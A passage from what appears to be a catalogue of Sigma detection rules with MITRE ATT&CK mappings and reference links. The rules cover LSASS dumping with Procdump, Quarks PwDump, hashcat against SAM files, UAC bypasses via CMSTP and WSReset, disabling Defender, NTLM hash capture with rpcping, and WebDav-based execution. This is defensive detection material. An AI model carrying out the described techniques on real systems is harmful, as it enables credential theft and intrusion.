  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10816. Table References

Links

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18

https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml

Renamed FTP.EXE Execution

Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields

The tag is: misp-galaxy:sigma-rules="Renamed FTP.EXE Execution"

Renamed FTP.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10817. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ftp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml

Potential LSASS Process Dump Via Procdump

Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.

The tag is: misp-galaxy:sigma-rules="Potential LSASS Process Dump Via Procdump"

Potential LSASS Process Dump Via Procdump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10818. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml

JSC Convert Javascript To Executable

Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format

The tag is: misp-galaxy:sigma-rules="JSC Convert Javascript To Executable"

JSC Convert Javascript To Executable has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10819. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Jsc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml

Potential Homoglyph Attack Using Lookalike Characters

Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.

The tag is: misp-galaxy:sigma-rules="Potential Homoglyph Attack Using Lookalike Characters"

Potential Homoglyph Attack Using Lookalike Characters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10820. Table References

Links

http://www.irongeek.com/homoglyph-attack-generator.php

https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml

HackTool - Quarks PwDump Execution

Detects usage of the Quarks PwDump tool via commandline arguments

The tag is: misp-galaxy:sigma-rules="HackTool - Quarks PwDump Execution"

HackTool - Quarks PwDump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 10821. Table References

Links

https://github.com/quarkslab/quarkspwdump

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml

Execute MSDT Via Answer File

Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)

The tag is: misp-galaxy:sigma-rules="Execute MSDT Via Answer File"

Execute MSDT Via Answer File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10822. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msdt/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml

Findstr Launching .lnk File

Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack

The tag is: misp-galaxy:sigma-rules="Findstr Launching .lnk File"

Findstr Launching .lnk File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 10823. Table References

Links

https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lnk.yml

Suspicious ScreenSave Change by Reg.exe

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension

The tag is: misp-galaxy:sigma-rules="Suspicious ScreenSave Change by Reg.exe"

Suspicious ScreenSave Change by Reg.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

Table 10824. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_screensaver.yml

PowerShell Base64 Encoded FromBase64String Cmdlet

Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line

The tag is: misp-galaxy:sigma-rules="PowerShell Base64 Encoded FromBase64String Cmdlet"

PowerShell Base64 Encoded FromBase64String Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10825. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml

Suspicious PowerShell Parameter Substring

Detects suspicious PowerShell invocation with a parameter substring

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Parameter Substring"

Suspicious PowerShell Parameter Substring has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10826. Table References

Links

http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml

Boot Configuration Tampering Via Bcdedit.EXE

Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.

The tag is: misp-galaxy:sigma-rules="Boot Configuration Tampering Via Bcdedit.EXE"

Boot Configuration Tampering Via Bcdedit.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10827. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md

https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml

Code Execution via Pcwutl.dll

Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.

The tag is: misp-galaxy:sigma-rules="Code Execution via Pcwutl.dll"

Code Execution via Pcwutl.dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10828. Table References

Links

https://twitter.com/harr0ey/status/989617817849876488

https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml

Import PowerShell Modules From Suspicious Directories - ProcCreation

Detects powershell scripts that import modules from suspicious directories

The tag is: misp-galaxy:sigma-rules="Import PowerShell Modules From Suspicious Directories - ProcCreation"

Import PowerShell Modules From Suspicious Directories - ProcCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10829. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml

Suspicious Spool Service Child Process

Detects suspicious print spool service (spoolsv.exe) child processes.

The tag is: misp-galaxy:sigma-rules="Suspicious Spool Service Child Process"

Suspicious Spool Service Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 10830. Table References

Links

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml

HackTool - CrackMapExec PowerShell Obfuscation

The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.

The tag is: misp-galaxy:sigma-rules="HackTool - CrackMapExec PowerShell Obfuscation"

HackTool - CrackMapExec PowerShell Obfuscation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

Table 10831. Table References

Links

https://github.com/byt3bl33d3r/CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml

HackTool - Sliver C2 Implant Activity Pattern

Detects process activity patterns as seen being used by Sliver C2 framework implants

The tag is: misp-galaxy:sigma-rules="HackTool - Sliver C2 Implant Activity Pattern"

HackTool - Sliver C2 Implant Activity Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10832. Table References

Links

https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36

https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml

Use of VisualUiaVerifyNative.exe

VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft’s recommended block rules.

The tag is: misp-galaxy:sigma-rules="Use of VisualUiaVerifyNative.exe"

Use of VisualUiaVerifyNative.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10833. Table References

Links

https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml

Firewall Configuration Discovery Via Netsh.EXE

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

The tag is: misp-galaxy:sigma-rules="Firewall Configuration Discovery Via Netsh.EXE"

Firewall Configuration Discovery Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 10834. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules

https://ss64.com/nt/netsh.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml

Hacktool Execution - PE Metadata

Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed

The tag is: misp-galaxy:sigma-rules="Hacktool Execution - PE Metadata"

Hacktool Execution - PE Metadata has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10835. Table References

Links

https://github.com/cube0x0

https://www.virustotal.com/gui/search/metadata%253ACube0x0/files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml

HackTool - Impacket Tools Execution

Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)

The tag is: misp-galaxy:sigma-rules="HackTool - Impacket Tools Execution"

HackTool - Impacket Tools Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 10836. Table References

Links

https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_tools.yml

Rundll32 Spawned Via Explorer.EXE

Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.

The tag is: misp-galaxy:sigma-rules="Rundll32 Spawned Via Explorer.EXE"

Table 10837. Table References

Links

https://redcanary.com/blog/raspberry-robin/

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml

Scheduled Task Executing Payload from Registry

Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.

The tag is: misp-galaxy:sigma-rules="Scheduled Task Executing Payload from Registry"

Scheduled Task Executing Payload from Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10838. Table References

Links

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml

Potentially Suspicious DLL Registered Via Odbcconf.EXE

Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn’t contain a ".dll" extension. Which is often used as a method to evade defenses.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious DLL Registered Via Odbcconf.EXE"

Potentially Suspicious DLL Registered Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10839. Table References

Links

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml

Suspicious Remote Child Process From Outlook

Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).

The tag is: misp-galaxy:sigma-rules="Suspicious Remote Child Process From Outlook"

Suspicious Remote Child Process From Outlook has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10840. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

https://github.com/sensepost/ruler

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml

Uncommon Svchost Parent Process

Detects an uncommon svchost parent process

The tag is: misp-galaxy:sigma-rules="Uncommon Svchost Parent Process"

Uncommon Svchost Parent Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 10841. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml

Suspicious WebDav Client Execution Via Rundll32.EXE

Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397

The tag is: misp-galaxy:sigma-rules="Suspicious WebDav Client Execution Via Rundll32.EXE"

Suspicious WebDav Client Execution Via Rundll32.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 10842. Table References

Links

https://twitter.com/aceresponder/status/1636116096506818562

https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/

https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml

Potentially Suspicious Child Process Of VsCode

Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Child Process Of VsCode"

Potentially Suspicious Child Process Of VsCode has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10843. Table References

Links

https://twitter.com/nas_bench/status/1618021838407495681

https://twitter.com/nas_bench/status/1618021415852335105

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml

User Added to Local Administrators Group

Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".

The tag is: misp-galaxy:sigma-rules="User Added to Local Administrators Group"

User Added to Local Administrators Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 10844. Table References

Links

https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml

Script Event Consumer Spawning Process

Detects a suspicious child process of Script Event Consumer (scrcons.exe).

The tag is: misp-galaxy:sigma-rules="Script Event Consumer Spawning Process"

Script Event Consumer Spawning Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10845. Table References

Links

https://redcanary.com/blog/child-processes/

https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml

HackTool - Hashcat Password Cracker Execution

Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against

The tag is: misp-galaxy:sigma-rules="HackTool - Hashcat Password Cracker Execution"

HackTool - Hashcat Password Cracker Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"

Table 10846. Table References

Links

https://hashcat.net/wiki/doku.php?id=hashcat

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml

Bypass UAC via CMSTP

Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files

The tag is: misp-galaxy:sigma-rules="Bypass UAC via CMSTP"

Bypass UAC via CMSTP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 10847. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmstp/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md

https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml

Capture Credentials with Rpcping.exe

Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.

The tag is: misp-galaxy:sigma-rules="Capture Credentials with Rpcping.exe"

Capture Credentials with Rpcping.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10848. Table References

Links

https://twitter.com/vysecurity/status/873181705024266241

https://twitter.com/vysecurity/status/974806438316072960

https://lolbas-project.github.io/lolbas/Binaries/Rpcping/

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml

New Process Created Via Taskmgr.EXE

Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC

The tag is: misp-galaxy:sigma-rules="New Process Created Via Taskmgr.EXE"

New Process Created Via Taskmgr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10849. Table References

Links

https://twitter.com/ReneFreingruber/status/1172244989335810049

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskmgr_susp_child_process.yml

PUA - Advanced Port Scanner Execution

Detects the use of Advanced Port Scanner.

The tag is: misp-galaxy:sigma-rules="PUA - Advanced Port Scanner Execution"

PUA - Advanced Port Scanner Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

Table 10850. Table References

Links

https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml

Disable Windows Defender AV Security Monitoring

Detects attackers attempting to disable Windows Defender using Powershell

The tag is: misp-galaxy:sigma-rules="Disable Windows Defender AV Security Monitoring"

Disable Windows Defender AV Security Monitoring has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10852. Table References

Links

https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml

PUA - DefenderCheck Execution

Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.

The tag is: misp-galaxy:sigma-rules="PUA - DefenderCheck Execution"

PUA - DefenderCheck Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

Table 10853. Table References

Links

https://github.com/matterpreter/DefenderCheck

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml

HackTool - SharpView Execution

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

The tag is: misp-galaxy:sigma-rules="HackTool - SharpView Execution"

HackTool - SharpView Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10854. Table References

Links

https://github.com/tevora-threat/SharpView/

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml

UAC Bypass WSReset

Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config

The tag is: misp-galaxy:sigma-rules="UAC Bypass WSReset"

UAC Bypass WSReset has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10855. Table References

Links

https://github.com/hfiref0x/UACME

https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf

https://lolbas-project.github.io/lolbas/Binaries/Wsreset/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml

DeviceCredentialDeployment Execution

Detects the execution of DeviceCredentialDeployment to hide a process from view

The tag is: misp-galaxy:sigma-rules="DeviceCredentialDeployment Execution"

DeviceCredentialDeployment Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10856. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/147

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml

WMIC Remote Command Execution

Detects the execution of WMIC to query information on a remote system

The tag is: misp-galaxy:sigma-rules="WMIC Remote Command Execution"

WMIC Remote Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10857. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic

https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml

PowerShell Base64 Encoded WMI Classes

Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", "Win32_ScheduledJob", etc.

The tag is: misp-galaxy:sigma-rules="PowerShell Base64 Encoded WMI Classes"

PowerShell Base64 Encoded WMI Classes has relationships with:

